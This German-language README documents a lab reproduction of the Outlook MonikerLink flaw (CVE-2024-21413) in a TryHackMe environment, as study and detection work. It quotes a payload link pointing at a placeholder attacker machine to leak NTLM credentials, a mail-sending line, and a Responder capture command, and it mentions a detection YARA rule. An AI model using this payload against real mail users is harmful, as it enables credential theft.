
Dieses Repository enthält Forschungsnotizen und einen Proof-of-Concept (PoC) auf hohem Niveau für CVE-2024-21413, eine Sicherheitslücke, die in bestimmten E-Mail-Clients bei der Verarbeitung von SMB/Moniker-artigen Links in Nachrichten beobachtet wurde. Der PoC und die hier dokumentierten Experimente wurden in einer kontrollierten Laborumgebung auf Systemen durchgeführt.
Dieses Projekt reproduziert das MonikerLink-Verhalten (CVE-2024-21413) in einer vollständig isolierten TryHackMe-Umgebung, um zu zeigen, wie bestimmte Hyperlink-Formate dazu führen können, dass Outlook einen Link so verarbeitet, dass Authentifizierungsversuche preisgegeben werden oder weitere Ausnutzung ermöglicht wird. Das Ergebnis ist ein PoC sowie eine priorisierte Liste von Abhilfemaßnahmen und Erkennungsvorschlägen, die Sicherheitsteams anwenden können. Es wurden keine live/unautorisierten Systeme angegriffen.
| Werkzeug / Fertigkeit | Zweck |
|---|---|
| Python | Skriptentwicklung |
| Linux (Kali) | Zielsystem |
| Metasploit | Ausnutzung & Zugriff |
| TryHackMe Lab | Kontrollierte Umgebung |
Dieser Code wurde von CMNatic geschrieben und ist hier zu finden.
Zum Beispiel in der Zeile „<a href=“file://ATTACKER_MACHINE/test!“ habe ich „ATTACKER_MACHINE“ durch die IP-Adresse meiner angreifenden Maschine ersetzt und in der Zeile „server = smtplib.SMTP('MAILSERVER', 25)“ habe ich „MAILSERVER“ durch die IP-Adresse meines Opferrechners geändert.
responder -I ens5
systemctl start systemd-resolved

Dieses Proof-of-Concept legt eine Nuance in Microsoft Outlooks Link-Verarbeitung offen: Bestimmte file://-artige Moniker-Links, die auf SMB-Ressourcen verweisen, können Outlooks Standardfilter umgehen und ausgehende Authentifizierungsversuche auslösen. Das hier gezeigte Verhalten wurde in einer vollständig kontrollierten TryHackMe-Umgebung reproduziert und zeigt, wie scheinbar harmlose Link-Formate Netzwerkinteraktionen verschleiern können. Obwohl Hersteller-Patches und Erkennungsrichtlinien veröffentlicht wurden, bleiben die zugrundeliegenden Mechanismen aufgrund legitimer Verwendungen des Moniker/File-Schemas komplex. Wichtig ist, dass die durch diesen PoC erzeugte Aktivität auf Netzwerkebene beobachtbar ist (z. B. in Paketerfassungen mit NTLM-Authentifizierungsversuchen), was sie für forensische Analysen und Incident Investigations zugänglich macht.
Eine Yara-Regel wurde von Florian Roth erstellt, um E-Mails zu erkennen, die das :file:\:-Element enthalten.
